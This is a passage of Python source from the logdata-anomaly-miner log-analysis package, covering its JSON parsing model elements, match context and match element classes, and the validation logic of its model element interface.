len(search_string)]) return None def parse_json_object(self, json_dict, json_match_data, key, split_key, current_path, match_context): """Parse a literal from the json object.""" current_path += "/" + key data = json_match_data[split_key] enc = "utf-8" if isinstance(data, str): if self.dec_escapes and self.is_ascii(data): enc = "unicode-escape" data = data.encode(enc) elif isinstance(data, bool): data = str(data).replace("T", "t").replace("F", "f").encode() elif data is None: data = b"null" if self.is_nullable_key(key) or json_dict[key] == "NULL_OBJECT": start = 0 if "null" in key: start = match_context.match_data.find(data) + 4 index = match_context.match_data.find(data, start) if match_context.match_data[index + 4] == 34: index += 1 return MatchElement(current_path, data, data, None), index, data return None, -1, data elif not isinstance(data, bytes): data = str(data).encode() if json_dict[key] == "ALLOW_ALL": logging.getLogger(DEBUG_LOG_NAME).debug(debug_log_prefix + "ALLOW_ALL (DICT)\n" + data.decode()) match_element = MatchElement(current_path, data, data, None) last_bracket = match_context.match_data.find(b"}", len(data)) while match_context.match_data.count(b"{", 0, last_bracket) - match_context.match_data.count(b"}", 0, last_bracket) > 0: last_bracket = match_context.match_data.find(b"}", last_bracket) + 1 index = last_bracket - len(data) elif json_dict[key] == "EMPTY_STRING": if data == b"": match_element = MatchElement(current_path, data, data, None) index = match_context.match_data.find(split_key.encode()) + len(split_key) index += match_context.match_data[index:].find(b'""') + len(b'""') else: match_element = None index = -1 else: match_element = json_dict[key].get_match_element(current_path, MatchContext(data)) data_len = len(data) if match_element is not None and len(match_element.match_string) != data_len and ( not isinstance(match_element.match_object, bytes) or len(match_element.match_object) != data_len): logging.getLogger(DEBUG_LOG_NAME).debug( debug_log_prefix + f"Data length not matching! match_string: {len(match_element.match_string)}, data: {data_len}," f" data: {data.decode()}") match_element = None index = max([match_context.match_data.replace(b"\\", b"").find(split_key.encode()), match_context.match_data.find(split_key.encode()), match_context.match_data.decode().find(split_key)]) index += match_context.match_data[index:].find(split_key.encode() + b'":') + len(split_key.encode() + b'":') try: index += max([match_context.match_data.decode(enc)[index:].find(data.decode(enc)), match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data)]) except UnicodeDecodeError: index += max([match_context.match_data.decode()[index:].find(data.decode()), match_context.match_data.replace(b"\\", b"")[index:].find(data), match_context.match_data[index:].find(data)]) index += len(match_context.match_data[index:]) - len(match_context.match_data[index:].lstrip(b" \r\t\n")) if match_context.match_data[index:].find(b'"') == 0: index += len(b'"') # for example float scientific representation is converted to normal float.. if index == -1 and match_element is not None and isinstance(json_match_data[split_key], float): indices = [match_context.match_data.find(b",", len(match_element.match_string) // 3), match_context.match_data.find(b"]"), match_context.match_data.find(b"}")] indices = [x for x in indices if x >= 0] index = min(indices) if match_element is None: index = -1 return match_element, index, data JsonStringModelElement.py000066400000000000000000000222311500476301700355340ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a model element for parsing json strings. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging import orjson from collections import deque from typing import Any from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class JsonAccessObject: """The JsonAccessObject transforms a dictionary. It takes a dictionary "d" and flattens the dictionary to: key.another_key.somelist[0].foo = bar During the flatten()-process, it will create a self.collection dictionary with the format: collection[flattened-key]{levels[],value} """ def __init__(self, d: dict): self.debug: bool = False self.levels: deque = deque() self.delimiter: str = '.' self.collection: dict = {} self.flatten(d) def join_levels(self): """Joins levels using a specific delimiter.""" ret = "" for i in self.levels: if not i.startswith("[") and len(ret) != 0: ret += self.delimiter ret += i return ret def create_collection_entry(self, index: str, levels: deque, value): """Adds entry to the collection.""" subentry = {} subentry['levels'] = levels.copy() subentry['value'] = value self.collection[index] = subentry def flatten(self, d: Any, islist=-1): """Recursive function for flattening a dictionary.""" if islist > -1: for k in d: if isinstance(k, dict): self.levels.append(f"[{islist}]") islist = islist+1 self.flatten(k) self.levels.pop() elif isinstance(k, list): self.flatten(k, list) else: if self.debug: print(f"{ self.join_levels() }[{ islist }]: { k }") self.create_collection_entry("%s[%d]" % (self.join_levels(), islist), self.levels, k) islist = islist + 1 else: for (k, v) in d.items(): if isinstance(v, dict): self.levels.append(k) self.flatten(v) if len(self.levels) != 0: self.levels.pop() elif isinstance(v, list): self.levels.append(k) self.flatten(v, 0) if len(self.levels) != 0: self.levels.pop() else: if len(self.levels) == 0: if self.debug: print(f"{ k } : { v }") self.create_collection_entry(k, deque([k]), v) else: if islist > -1: self.levels.append(f"{k}[{ islist}]") islist = islist+1 else: self.levels.append(k) if self.debug: print(f"{ self.join_levels() } : { v }") self.create_collection_entry(self.join_levels(), self.levels, v) self.levels.pop() class JsonStringModelElement(ModelElementInterface): """This class parses json-strings and matches the keys with a given key_parser_dict.""" def __init__(self, element_id: str, key_parser_dict: dict, strict_mode: bool = False, ignore_null: bool = True): self.children: list = [] self.strict_mode = strict_mode self.ignore_null = ignore_null if not isinstance(key_parser_dict, dict): msg = "key_parser_dict has to be of the type dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.jao = JsonAccessObject(key_parser_dict) if not isinstance(element_id, str): msg = "element_id has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(element_id) < 1: msg = "element_id must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.element_id = element_id self.fill_children() super().__init__(element_id, key_parser_dict=key_parser_dict, strict_mode=strict_mode, ignore_null=ignore_null) def fill_children(self): """Creates list of children from config-json.""" for entry in self.jao.collection.values(): self.children.append(entry['value']) def get_id(self): """Get the element ID.""" return self.element_id def get_child_elements(self): """Get all possible child model elements of this element. @return None as there are no children of this element. """ return self.children def get_match_element(self, path: str, match_context): """Just return a match including all data from the context.""" current_path = f"{ path }/ { self.element_id }" logging.getLogger(DEBUG_LOG_NAME).info("JsonStringModelElement %s/%s", path, match_context.match_data.decode('utf-8')) matches = [] try: jdict = orjson.loads(match_context.match_data) if self.strict_mode: jdictjao = JsonAccessObject(jdict) if len(jdictjao.collection) != len(self.jao.collection): msg = "JsonStringModelElement-subparser-error: " msg += "strict mode enabled and fields detected that do not exist in parser-config" logging.getLogger(DEBUG_LOG_NAME).debug(msg) return None try: for (k, v) in self.jao.collection.items(): # empty string if value is null parse_line = b"" if jdictjao.collection[k]['value'] is not None: parse_line = str(jdictjao.collection[k]['value']).encode('utf-8') else: if self.ignore_null: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: ignore null at %s", k) continue child_match = v['value'].get_match_element(current_path, MatchContext(parse_line)) if child_match is None: msg = "JsonStringModelElement-subparser-error: %s -> %s" logging.getLogger(DEBUG_LOG_NAME).debug(msg, k, str(jdictjao.collection[k]['value'])) return None matches += [child_match] except KeyError: msg = "JsonStringModelElement-subparser-error: field \"%s\" not found but strict-enabled" logging.getLogger(DEBUG_LOG_NAME).debug(msg, k) return None else: for (k, v) in self.jao.collection.items(): tmp = jdict.copy() try: for level in v['levels']: tmp = tmp[level] except KeyError: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement-subparser: %s not found", k) parse_line = b"" # empty string if value is null if tmp is not None: parse_line = str(tmp).encode('utf-8') else: if self.ignore_null: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement: ignore null at %s", k) continue child_match = v['value'].get_match_element(current_path, MatchContext(parse_line)) if child_match is None: logging.getLogger(DEBUG_LOG_NAME).debug("JsonStringModelElement-subparser-error: %s -> %s", k, tmp) return None matches += [child_match] except orjson.JSONDecodeError as exception: msg = f"JsonStringModelElement { exception }: { match_context.match_data.decode('utf-8') }" logging.getLogger(DEBUG_LOG_NAME).error(msg) return None match_data = match_context.match_data if not match_data: return None match_context.update(match_data) return MatchElement(current_path, match_data, match_data, matches) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/MatchContext.py000066400000000000000000000112711500476301700336230ustar00rootroot00000000000000"""This module defines the match context. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from typing import Union from aminer.AminerConfig import DEBUG_LOG_NAME from aminer import AminerConfig class MatchContext: """This class allows storage of data relevant during the matching process, e.g. the root node and the remaining unmatched data. Then searching for non-atomic matches, e.g. sequences, the context might be modified by model subelements, even if the main model element will not return a match. In that case, those non-atomic model elements have to care to restore the context before returning. """ def __init__(self, match_data: bytes): """Create a MatchContext with the full unmatched string data. @param match_data the data that will be tested by the next model element. """ if not isinstance(match_data, bytes): msg = "match_data has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.match_data = match_data def update(self, match_string: bytes): """Update the match context by removing the given matched string data from the context data still to be matched. This method does not check, if the removed data is the same as the trailing match data for performance reasons. This is done only in the DebugMatchContext class. """ self.match_data = self.match_data[len(match_string):] class DebugMatchContext(MatchContext): """This class defines a slower MatchContext for debugging purposes.""" def __init__(self, match_data: bytes): self.debug_info = "" self.last_match_data: Union[None, bytes] = None self.shortest_unmatched_data = match_data super(DebugMatchContext, self).__init__(match_data) def update(self, match_string: bytes): """Update the context and store debugging information.""" if not isinstance(match_string, bytes): msg = "match_string has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(match_string) < 1: return try: match_data = self.match_data.decode(AminerConfig.ENCODING) m_string = match_string.decode(AminerConfig.ENCODING) except UnicodeError: match_data = repr(self.match_data) m_string = repr(match_string) if self.last_match_data != self.match_data: self.last_match_data = self.match_data if self.debug_info != "": self.debug_info += " " self.debug_info += f'Starting match update on "{match_data}"\n' if not self.match_data.startswith(match_string): self.debug_info += f' Current data {match_data} does not start with "{m_string}"\n' msg = "Illegal state" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.match_data = self.match_data[len(match_string):] self.last_match_data = self.match_data if (self.shortest_unmatched_data is None) or (len(self.match_data) < len(self.shortest_unmatched_data)): self.shortest_unmatched_data = self.match_data self.debug_info += f' Removed: "{m_string}", remaining {len(self.match_data)} bytes\n' def get_debug_info(self): """Get the current debugging information and reset it.""" while self.debug_info.find("\n\n") != -1: self.debug_info = self.debug_info.replace("\n\n", "\n") result = self.debug_info self.debug_info = "" try: data = self.shortest_unmatched_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(self.shortest_unmatched_data) result += f' Shortest unmatched data: "{data}"\n' return result def get_shortest_unmatched_data(self): """Get the shortest match_data found while updating the internal state. This is useful to find out where the parsing process has terminated. """ return self.shortest_unmatched_data logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing/MatchElement.py000066400000000000000000000144031500476301700335700ustar00rootroot00000000000000"""This module provides only the MatchElement class to store results from parser element matching process. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from typing import Any, List, Union from aminer.AminerConfig import DEBUG_LOG_NAME from aminer import AminerConfig class MatchElement: """This class allows storage and handling of data related to a match found by a model element.""" def __init__(self, path: Union[str, None], match_string: bytes, match_object: Any, children: Union[List["MatchElement"], None]): """Initialize the MatchElement. @param path when None, this element is anonymous. Hence, it cannot be added to the result data and cannot have children. @param match_string the part of the input bytes string covered by the given match. @param match_object the matchString converted to an object for matchers detecting more complex data types, e.g., integer numbers or IP addresses. @param children list of MatchElements which matched in the process. """ if not isinstance(path, str) and path is not None: msg = "path has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if (not path) and children: msg = "Anonymous match may not have children" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.path = path if not isinstance(match_string, bytes): msg = "match_string has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.match_string = match_string self.match_object = match_object if not isinstance(children, list) and children is not None: msg = "children has to be of the type list or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(children, list): if len(children) < 1: msg = "children must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for child in children: if not isinstance(child, MatchElement): msg = "children have to be of the type MatchElement." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.children = children def get_path(self): """Get the path of this element.""" return self.path def get_match_string(self): """Get the log_atom string part this match element is matching.""" return self.match_string def get_match_object(self): """Get the matched data converted to an object of suitable type.""" return self.match_object def get_children(self): """Get the submatch children of this match, if any.""" return self.children def annotate_match(self, indent_str: Union[str, None]): """Annotate a given match element showing the match path elements and the parsed values. @param indent_str if None, all elements are separated just with a single space, no matter how deep the nesting level of those elements is. If not None, all elements are put into an own line, that is prefixed by the given indent_str and indenting is increased by two spaces for each level. """ next_indent = None if not isinstance(indent_str, str) and indent_str is not None: msg = "indent_str has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) try: if isinstance(self.match_object, bytes): data = self.match_object.decode(AminerConfig.ENCODING) else: data = repr(self.match_object) except UnicodeError: data = repr(self.match_object) if indent_str is None: result = f"{self.path}: {data}" else: result = f"{indent_str}{self.path}: {data}" next_indent = indent_str + " " if self.children is not None: for child_match in self.children: if next_indent is None: result += " " + child_match.annotate_match(None) else: result += "\n" + child_match.annotate_match(next_indent) return result def serialize_object(self): """Create a serialization of this match element and all the children. With sane and unique path elements, the serialized object will also be unique. """ children = [] if self.children: for child_match in self.children: children.append(child_match.serialize_object()) return {"path": self.path, "match_object": self.match_object, "match_string": self.match_string, "children": children} def __str__(self): """Get a string representation of this match element excluding the children.""" num_children = 0 if self.children is not None: num_children = len(self.children) try: match_string = self.match_string.decode(AminerConfig.ENCODING) if isinstance(self.match_object, bytes): match_object = self.match_object.decode(AminerConfig.ENCODING) else: match_object = repr(self.match_object) except UnicodeError: match_string = repr(self.match_string) match_object = repr(self.match_object) return f"MatchElement: path = {self.path}, string = {match_string}, object = {match_object}, children = {num_children}" ModelElementInterface.py000066400000000000000000000670601500476301700353450ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines various interfaces for log atom parsing and namespace shortcuts to the ModelElements. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc import locale import logging import re from aminer.AminerConfig import DEBUG_LOG_NAME SIGN_TYPE_NONE = "none" SIGN_TYPE_OPTIONAL = "optional" SIGN_TYPE_MANDATORY = "mandatory" PAD_TYPE_NONE = "none" PAD_TYPE_ZERO = "zero" PAD_TYPE_BLANK = "blank" EXP_TYPE_NONE = "none" EXP_TYPE_OPTIONAL = "optional" EXP_TYPE_MANDATORY = "mandatory" class ModelElementInterface(metaclass=abc.ABCMeta): """This is the superinterface of all model elements.""" def __init__(self, element_id, **kwargs): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param date_format, is a byte string that represents the date format for parsing, see Python strptime specification for available formats. Supported format specifiers are: * %b: month name in current locale * %d: day in month, can be space or zero padded when followed by separator or at end of string. * %f: fraction of seconds (the digits after the the ".") * %H: hours from 00 to 23 * %M: minutes * %m: two digit month number * %S: seconds * %s: seconds since the epoch (1970-01-01) * %Y: 4 digit year number * %z: detect and parse timezone strings like UTC, CET, +0001, etc. automatically. Common formats are: * "%b %d %H:%M:%S" e.g. for "Nov 19 05:08:43" * "%d.%m.%YT%H:%M:%S" e.g. for "07.02.2019T11:40:00" * "%d.%m.%Y %H:%M:%S.%f" e.g. for "07.02.2019 11:40:00.123456" * "%d.%m.%Y %H:%M:%S%z" e.g. for "07.02.2019 11:40:00+0000" or "07.02.2019 11:40:00 UTC" * "%d.%m.%Y" e.g. for "07.02.2019" * "%H:%M:%S" e.g. for "11:40:23" @param time_zone the timezone for parsing the values or UTC when None. @param text_locale the locale to use for parsing the day, month names or None to use the default locale. The locale must be a tuple of (locale, encoding) or a string. @param start_year when parsing date records without any year information, assume this is the year of the first value parsed. @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that window, the value is still parsed, corrected to the most likely value but does not change the detection year. @param timestamp_scale scales the seconds in %s to get seconds (=1), milliseconds (=1000), microseconds (=1000000), etc. @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -. @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value. @param exponent_type defines the allowed types of exponential values. With EXP_TYPE_NONE no exponential values are allowed, EXP_TYPE_OPTIONAL allows exponential values and with EXP_TYPE_MANDATORY every value must contain exponential values. @param delimiter a non-escaped delimiter string to search for. @param escape a character to escape in the string. @param consume_delimiter True if the delimiter character should also be consumed. @param value_model the ModelElement which has to match the data. @param value_path the relative path to the target value from the value_model element on. When the path does not resolve to a value, this model element will not match. A path value of None indicates, that the match element of the value_model should be used directly. @param branch_model_dict a dictionary to select a branch for the value identified by valuePath. @param default_branch when lookup in branch_model_dict fails, use this as default branch or fail when None. @param children a list of child elements to be iterated through. @param fixed_data a non-escaped delimiter string to search for. @param wordlist the list of words to search for. If it does not fulfill the sorting criteria mentioned in the class documentation, an Exception will be raised. @param ipv6 if True, IPv6 addresses are parsed, IPv4 addresses are parsed otherwise. @param key_parser_dict: A dictionary of all keys with the according parsers. If a key should be optional, the associated parser must start with the OptionalMatchModelElement. To allow every key in a JSON object use "key": "ALLOW_ALL". To allow only empty arrays - [] - use "key": "EMPTY_ARRAY". To allow only empty objects - {} - use "key": "EMPTY_OBJECT". To allow only empty strings - "" - use "key": "EMPTY_STRING". To allow all keys in an object for a parser use "ALLOW_ALL_KEYS": parser. To allow only null values use "key": "NULL_OBJECT". @param optional_key_prefix: If some key starts with the optional_key_prefix it will be considered optional. @param nullable_key_prefix: The value of this key may be null instead of any expected value. @param allow_all_fields: Unknown fields are skipped without parsing with any parsing model. @param optional_element the element to be optionally matched. @param repeated_element the MatchElement to be repeated in the data. @param min_repeat the minimum number of repeated matches of the repeated_element. @param max_repeat the maximum number of repeated matches of the repeated_element. @param upper_case if True, the letters of the hex alphabet are uppercase, otherwise they are lowercase. @param alphabet the allowed letters to match data. @param strict_mode If strict is set to true all keys must be defined. The parser will fail if the logdata has a json-key that is not defined in the key_parser_dict @param ignore_null ignore json-keys with values "null" @param root_element: The name of the root xml element. @param attribute_prefix: This prefix indicates that the element is an attribute of the previous element. @param optional_attribute_prefix: If some attribute starts with this prefix it will be considered optional. @param empty_allowed_prefix: If an element starts with this prefix, it may be empty. @param xml_header_expected: True if the xml header is expected. """ allowed_kwargs = [ "date_format", "time_zone", "text_locale", "start_year", "max_time_jump_seconds", "value_sign_type", "value_pad_type", "exponent_type", "delimiter", "escape", "consume_delimiter", "value_model", "value_path", "branch_model_dict", "default_branch", "children", "fixed_data", "wordlist", "ipv6", "key_parser_dict", "optional_key_prefix", "nullable_key_prefix", "allow_all_fields", "optional_element", "repeated_element", "min_repeat", "max_repeat", "upper_case", "alphabet", "strict_mode", "ignore_null", "timestamp_scale", "root_element", "attribute_prefix", "optional_attribute_prefix", "empty_allowed_prefix", "xml_header_expected" ] for argument, value in list(locals().items())[1:-1]: # skip self parameter and kwargs if value is not None: setattr(self, argument, value) for argument, value in kwargs.items(): # skip self parameter and kwargs if argument not in allowed_kwargs: msg = f"Argument {argument} is unknown. Consider changing it or adding it to the allowed_kwargs list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) setattr(self, argument, value) if not isinstance(element_id, str): msg = "element_id has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(element_id) < 1: msg = "element_id must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "date_format"): if not isinstance(self.date_format, bytes): msg = "date_format has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.date_format) <= 1: msg = "At least one date_format specifier must be defined." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "text_locale") and self.text_locale is not None: if not isinstance(self.text_locale, str) and not isinstance(self.text_locale, tuple): msg = "text_locale has to be of the type string or of the type tuple and have the length 2. (locale, encoding)" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if isinstance(self.text_locale, tuple) and len(self.text_locale) != 2: msg = "text_locale has to be of the type string or of the type tuple and have the length 2. (locale, encoding)" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) try: old_locale = locale.getlocale() if old_locale != self.text_locale: locale.setlocale(locale.LC_ALL, self.text_locale) msg = f"Changed time locale from {self.text_locale} to {''.join(self.text_locale)}." logging.getLogger(DEBUG_LOG_NAME).info(msg) except locale.Error: msg = f"text_locale {self.text_locale} is not installed!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise locale.Error(msg) if hasattr(self, "start_year") and self.start_year is not None and (not isinstance(self.start_year, int) or isinstance( self.start_year, bool)): msg = "start_year has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "max_time_jump_seconds"): if not isinstance(self.max_time_jump_seconds, int) or isinstance(self.max_time_jump_seconds, bool): msg = "max_time_jump_seconds has to be of the type integer." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.max_time_jump_seconds <= 0: msg = "max_time_jump_seconds must not be lower than 1 second." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "value_sign_type"): if not isinstance(self.value_sign_type, str): msg = f"value_sign_type must be of type string. Current type: {type(self.value_sign_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.value_sign_type == SIGN_TYPE_NONE: self.start_characters = set(b"0123456789") elif self.value_sign_type == SIGN_TYPE_OPTIONAL: self.start_characters = set(b"-0123456789") elif self.value_sign_type == SIGN_TYPE_MANDATORY: self.start_characters = set(b"+-") else: msg = f"Invalid value_sign_type {self.value_sign_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "value_pad_type"): self.pad_characters = b"" if not isinstance(self.value_pad_type, str): msg = f"value_pad_type must be of type string. Current type: {type(self.value_pad_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.value_pad_type == PAD_TYPE_NONE: pass elif self.value_pad_type == PAD_TYPE_ZERO: self.pad_characters = b"0" elif self.value_pad_type == PAD_TYPE_BLANK: self.pad_characters = b" " else: msg = f"Invalid value_pad_type {self.value_pad_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "exponent_type"): if not isinstance(self.exponent_type, str): msg = f"exponent_type must be of type string. Current type: {type(self.exponent_type)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.exponent_type not in [EXP_TYPE_NONE, EXP_TYPE_OPTIONAL, EXP_TYPE_MANDATORY]: msg = f"Invalid exponent_type {self.exponent_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "delimiter"): if not isinstance(self.delimiter, bytes): msg = "delimiter has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.delimiter) < 1: msg = "delimiter must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "escape") and self.escape is not None: if not isinstance(self.escape, bytes): msg = "escape has to be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.escape) < 1: msg = "escape must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "consume_delimiter") and not isinstance(self.consume_delimiter, bool): msg = "consume_delimiter has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "value_model") and not isinstance(self.value_model, ModelElementInterface): msg = "value_model has to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "value_path") and self.value_path is not None: if not isinstance(self.value_path, str): msg = "value_path has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.value_path) < 1: msg = "value_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "branch_model_dict"): if not isinstance(self.branch_model_dict, dict): msg = "branch_model_dict has to be of the type dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for val in self.branch_model_dict.values(): if not isinstance(val, ModelElementInterface): msg = "all branch_model_dict values have to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "default_branch") and self.default_branch is not None and not isinstance( self.default_branch, ModelElementInterface): msg = "default_branch has to be of the type string or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "children"): if not isinstance(self.children, list): msg = "children has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.children) < 1: msg = "children must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for child in self.children: if not isinstance(child, ModelElementInterface): msg = "all children have to be of the type ModelElementInterface." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "fixed_data"): if not isinstance(self.fixed_data, bytes): msg = "fixed_data has to be of the type byte string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.fixed_data) < 1: msg = "fixed_data must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "wordlist"): if not isinstance(self.wordlist, list): msg = "wordlist has to be of the type list." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.wordlist) < 1: msg = "wordlist must have at least one element." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for word in self.wordlist: if not isinstance(word, bytes): msg = "words from the wordlist must be of the type bytes." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) for test_pos, ref_word in enumerate(self.wordlist): for test_word in self.wordlist[test_pos + 1:]: if test_word.startswith(ref_word): msg = f"Word {repr(test_word)} would be shadowed by word {repr(ref_word)} at lower position" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "upper_case"): if not isinstance(self.upper_case, bool): msg = "upper_case has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if self.upper_case: self.hex_regex = re.compile(rb"[0-9A-F]+") else: self.hex_regex = re.compile(rb"[0-9a-f]+") if hasattr(self, "ipv6") and not isinstance(self.ipv6, bool): msg = "ipv6 has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "key_parser_dict") and not isinstance(self.key_parser_dict, dict): msg = "key_parser_dict has to be of the type dict." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "optional_key_prefix"): if not isinstance(self.optional_key_prefix, str): msg = "optional_key_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.optional_key_prefix) < 1: msg = "optional_key_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "nullable_key_prefix"): if not isinstance(self.nullable_key_prefix, str): msg = "nullable_key_prefix has to be of the type string." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(self.nullable_key_prefix) < 1: msg = "nullable_key_prefix must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "optional_key_prefix") and hasattr(self, "nullable_key_prefix") and\ self.optional_key_prefix == self.nullable_key_prefix: msg = "optional_key_prefix must not be the same as nullable_key_prefix!" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if hasattr(self, "allow_all_fields") and not isinstance(self.allow_all_fields, bool): msg = "allow_all_fields has to be of the type bool." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if hasattr(self, "optional_element") and not isinstance(self.optional_element, ModelElementInterface): msg = "optional_element has to be of the type ModelElementInterface." 